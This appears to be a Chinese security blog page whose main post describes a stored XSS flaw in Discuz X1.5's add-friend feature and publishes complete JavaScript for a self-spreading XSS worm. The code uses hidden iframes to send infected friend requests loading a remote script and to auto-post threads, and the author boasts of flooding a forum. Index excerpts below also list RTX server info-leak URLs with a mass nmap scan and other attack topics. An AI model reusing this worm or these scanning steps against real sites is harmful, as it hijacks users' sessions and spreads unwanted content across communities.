Discuz X1.5 在添加好友的地方有处存储xss,借助此处xss跟用户交互可以进行蠕虫指数扩散。

位置在添加好友处

 

x完之后的效果

  

点击后触发

 

ok 借助此存储xss,我们进行worm传播,dz的会话cookie是被打伤http-only的,但是xss的效果是获取你当前域下的用户会话的权限。这不干扰我们worm的进行。

step 1 : attacker 发送带xss worm payload给 用户a,

step 2 : 用户A点击后,自身作为宿主去添加其他人为好友,并且附带攻击payload

step 3 : 被x的用户互相感染,成指数增长,为了验证,凡是被感染的用户都会被我们用js控制发一个帖子

没code说个jb,worm代码如下

你需要修改

1 urlBase 为你的想1.5 论坛基地址

2 存放xss的payload的地址

 

 

//code for xss test


//论坛的基地址
var urlBase = "http://forum.xxx.com";



var add= function(uid){

    var ifBox = window['ifBox'] || (window['ifBox']={});

    var uyk = (new Date()).getTime();

    var ifFame = ifBox[uyk] =document.createElement("iframe");

    ifFame.src=urlBase + "/home.php?mod=spacecp&ac=friend&op=add&uid="+uid;

    ifFame.width=0;ifFame.height=0;

    ifFame.onload = function(){

        try{
//存放xss payload的地址
            ifFame.contentDocument.getElementsByName("note")[0].value= 'hello<script src="http://xxx.xxx.xxx/js/dz.js"></script>';

            ifFame.contentDocument.getElementById("addsubmit_btn").click();

            ifFame=null;

        }catch(err){

        }

    }    

    document.body.appendChild(ifFame);

}





var newThread = function(){

    var if1 = document.createElement("iframe");

    if1.src= urlBase+"/forum.php?mod=post&action=newthread&fid=21";

    if1.width=0;if1.height=0;

    if1.onload = function(){

        var doc =if1.contentDocument;

        doc.getElementById("subject").value = "哇卡卡卡~~~";

        if1.contentDocument.getElementById("e_iframe").contentDocument.body.innerHTML =" _______________</br>< XSS Worm Test ></br> ---------------</br>        \   ^__^</br>         \  (oo)\_______</br>            (__)\       )\/\</br>                ||----w |</br>                ||     ||</br>";

        doc.getElementById("postsubmit").click();

        if1.onload = function(){return false;}

    }

    document.body.appendChild(if1);

}





var if0 = document.createElement("iframe");

if0.src= urlBase + "/forum.php?showoldetails=yes#online";

if0.width=0;if0.height=0;

if0.onload = function(){

    var uli =if0.contentDocument.getElementsByTagName("li");

    for(var i = 0;i<uli.length;i++){

        if(uli[i].title.length > 5){

            var uid = uli[i].childNodes[3].href.substring(uli[i].childNodes[3].href.indexOf("uid=")+4);



            var r = Math.round(Math.random() * 10);

           // if(i%10 == r){

                //轻点

                newThread();

                add(uid);

          //  }

        }

    }

}

document.body.appendChild(if0);

 

 

这里面又很多的坑包括js的异步加载,跨iframe的元素操作等等,希望对其他人能提供帮助。

实际的worm效果是,20分钟内刷了30页,每页20篇的论坛帖子把~~

 

posted @ 2015-11-10 13:29 l4wl137 阅读(1174) 评论(2) 推荐(2) 编辑
摘要: 原先一直用xss.hk结果不知怎么被关的,正好手上有代码于是自己搭了一个,网上的类似的xss平台大多一样,原先的xss的chrome插件,不适合 "manifest_version": 2,而且很多其他的xss平台直接把代码拿过来,chrome插件的里面的许多代码内容跟xss.me这个与域名绑定... 阅读全文
posted @ 2014-08-27 10:50 l4wl137 阅读(4124) 评论(0) 推荐(0) 编辑
摘要: 看web看多了,想写写页游的外挂,其实原理是一样的,就是端口不一样协议字段你不知道,而这也提高了点技术门槛,看我们来一点一点突破这些门槛,这次我们来用python发包模拟flash的客户端登陆。 以热血三国2为例,热血三国2是一款balabalaba自己查去吧的游戏。step1 : 在sg2.... 阅读全文
posted @ 2014-08-27 10:17 l4wl137 阅读(8103) 评论(11) 推荐(9) 编辑
摘要: $ wget https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1239578/+attachment/4057550/+files/rtl_92ce_92se_92de_8723ae_88ee_8723be_92ee_linux_ma... 阅读全文
posted @ 2014-04-21 21:50 l4wl137 阅读(2655) 评论(0) 推荐(0) 编辑
摘要: 最近公司换了yaf框架,突然对用c实现php拓展感兴趣了,如果一个功能已经很稳定很成熟而且用的地方很多,那么我们就可以尝试用拓展实现(不一定每种情况都可以写成拓展),写成拓展后就不用每次用都包含一下,工具类直接随php启动加载进内存里。 我这次是把用户会话加密类写成了php的拓展,用户类是基于des加密的,主要实现了,isLogin //判断是否登录setLogin //就是种个加密的cookiegetUidgetUsername我给这个项目起名slime(史莱姆),勇者斗恶龙里的小怪,黏黏的。。。。。。ok,先来看下php的实现,因为我们是php -> c,所以先看下php的实现,其实 阅读全文
posted @ 2014-04-12 13:08 l4wl137 阅读(1393) 评论(0) 推荐(1) 编辑
摘要: 塔珀自指公式是杰夫·塔珀(Jeff Tupper)发现的自指公式:此公式的二维图像与公式本身外观一样。此公式在众多数学与计算机科学课程里被用作绘制公式图像的练习作业。公式最初于他2001年SIGGRAPH的论文中提及。此论文主要讨论他开发的GrafEq公式作图程序的相关方法。此公式是个不等式:其中表示地板函数,mod表示模除。如果让常数k等于:48584506361897134235820959624942020445814005879832445494830930850619347047088099284506447698655243648499972470249151191104 阅读全文
posted @ 2014-03-11 19:27 l4wl137 阅读(5644) 评论(0) 推荐(1) 编辑
摘要: Attacking MongoDB2人收藏收藏2014/01/10 17:14|瞌睡龙|漏洞分析|占个座先0x00 背景本文主要来自于HITB Ezine Issue 010中的《Attacking MongoDB》MongoDB是一个基于分布式文件存储的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性能数据存储解决方案。是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。他支持的数据结构非常松散,是类似json的bson格式,因此可以存储比较复杂的数据类型。Mongo最大的特点是他支持的查询语言非常强大,其语法有点类似于面向对象的查询语言, 阅读全文
posted @ 2014-01-23 10:42 l4wl137 阅读(277) 评论(0) 推荐(1) 编辑
摘要: 苍山洱海旁 你在我身边这次的夏天和从前不太一样单车在经过田野 你轻轻唱睁开了双眼只剩下相片牵手走过的街道就在眼前经过的路人和我们那时一样真的永远无法和你在一起但我会微笑着想起远方的你我真的只能唱歌给你听因为长大后的世界还是分不清一颗心 不大的地方有许多许多你明天的电话里依然是我想你我真的只想唱歌给你听没有甜蜜的话语只有一起走过的路两个人在不同的地方 会是怎么样明天的电话里依然是我想你 阅读全文
posted @ 2014-01-07 19:03 l4wl137 阅读(335) 评论(0) 推荐(0) 编辑
摘要: 腾讯通RTX(Real Time eXchange)是腾讯公司推出的企业级实时通信平台.rtx server 存在暴露用户信息的漏洞,通过web访问http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号http://RtxServerIp:8012/check.php #验证弱口令脚本化攻击思路: sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml nmap 扫描大网段以基数来 阅读全文
posted @ 2013-12-29 16:00 l4wl137 阅读(2310) 评论(0) 推荐(0) 编辑
摘要: 转载请保留原文链接:http://upker.net/?post=12简单一个FAQ,把一些可能遇到的问题整理一下[首先是OsmocomBB编译流程及可能出现的问题]1.环境选择硬件:笔记本、C118手机(或其他可用手机,列表见http://bb.osmocom.org/trac/wiki/Hardware/Phones)FT232RL、CP2102、PL2303 USB2TTL 模块一个、2.5mm 耳机插头带线一根推荐定制线、淘宝有售、搜索T191刷机线。软件:Ubuntu系列、Debian系列、尽量i386包:apt-get install libtool shtool autoconf 阅读全文
posted @ 2013-12-18 17:09 l4wl137 阅读(3107) 评论(1) 推荐(1) 编辑
点击右上角即可分享
微信分享提示